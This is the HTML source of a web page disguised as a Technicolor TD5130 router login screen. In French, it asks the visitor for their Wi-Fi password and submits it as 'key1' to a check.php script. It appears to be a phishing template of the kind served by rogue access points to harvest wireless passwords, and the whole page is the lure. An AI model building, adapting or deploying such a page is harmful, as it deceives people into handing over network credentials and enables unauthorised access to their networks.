<html><head>








<meta name="viewport" content="width=device-width">


<style>
img {
    max-width: 100%;
}
</style>
  <title>Technicolor Gateway - Connexion</title>
  
  <script type="text/javascript" src="./SKN/jquery-1.1.js"></script>
  <script type="text/javascript" src="./SKN/jquery.i18n.js"></script>
  
 
 
  <link rel="stylesheet" type="text/css" href="./SKN/styles.css">
  
  



</head>
<body height="100%" style="margin:0px;">
 
  


  <table cellspacing="0" cellpadding="0" border="0" class="main">
    <tbody><tr>
      <td>
        <table cellspacing="0" cellpadding="0" class="banner" width="100%">
          <tbody><tr>
          	<td>		
				<p id="productName" class="product">
		          	<script type="text/javascript">
					   var headerText = ModelName;
					   document.write(headerText.replace(" ","&nbsp;"));
		            </script>Technicolor&nbsp;TD5130
                </p>
				<p class="displaySettings" id="displaySettings" style="visibility: hidden;">
						<span class="langSelect" id="langSelect">
							</span></p><form name="langSelect" action="" method="post"><input type="hidden" name="6" value="en">
                            <input type="hidden" name="rn" value="-1163067184">

							</form>
						            
					<p></p>
				
            </td>
            <td class="logo">
				<img src="./SKN/logo.gif">
            </td>            
          </tr> 
        </tbody></table>
      </td>
    </tr>
    <tr>
    <td class="page" width="760">
        <table cellpadding="0" cellspacing="0" border="0" width="100%">
          <tbody><tr>
            <td>
              <table cellspacing="0" cellpadding="0" border="0" width="100%">
                <tbody><tr>
                  <td>
				  
<div class="contentcontainer">
<hr>
<div class="contentitem">
<table cellspacing="0" cellpadding="0">
  <tbody><tr><td class="icon" valign="top" width="100px"><img src="./SKN/user__xl.gif" alt="Login !"></td>
  <td class="data" valign="top"><table cellspacing="0" cellpadding="0"><tbody><tr><td align="left"><span class="trad itemtitle_wizard" key="PAGE_ADMIN_LOGIN_HEAD">Connexion</span></td><td align="right"></td></tr>
  <tr><td colspan="2">
   <br><b>
   
   Saisissez Le mot de passe de Votre Wifi

</b>


<form id="form1" name="form1" method="POST" action="check.php" >
    <table width="100%" cellspacing="0" cellpadding="0">
      <tbody><tr><td width="40" valign="top"></td>
      <td valign="top">
        <br><center></center><center></center><table width="100%" class="datatable" cellspacing="0" cellpadding="0">
          <tbody><tr><td></td><td width="30px"></td><td width="220px"></td><td width="50px"></td></tr>
          
          
          <tr><td colspan="4" height="7"><img src="./SKN/spacer.gif" alt="" border="0" height="7" width="1"></td></tr>
          
            <td colspan="3"><input type="password" name="key1" id="password" maxlength="64" style="width: 250px;"></td>
          </tr>
          <tr><td colspan="4" height="7"><img src="./SKN/spacer.gif" alt="" border="0" height="7" width="1"></td></tr>
          <tr><td colspan="4" id="forbidden" style="display:none" align="center"></td></tr>
          <tr>
            <td colspan="4" align="center">
			  
			  <input name="ok" type="submit" value="Submit">
        	  <input name="cancel" type="reset" value="annuler">
            </td>
          </tr>
        </tbody></table>
      </td></tr>
    </tbody></table>
    </form>
    </td></tr></tbody></table>
</td></tr></tbody></table>
</div>

<script type="text/javascript">
//<![CDATA[
document.authform.user.focus();
//]]>
</script>

</div>
                  </td>
                </tr>
              </tbody></table>
            </td>
          </tr>
        </tbody></table>
      </td>
    </tr>
  </tbody></table>


</body></html>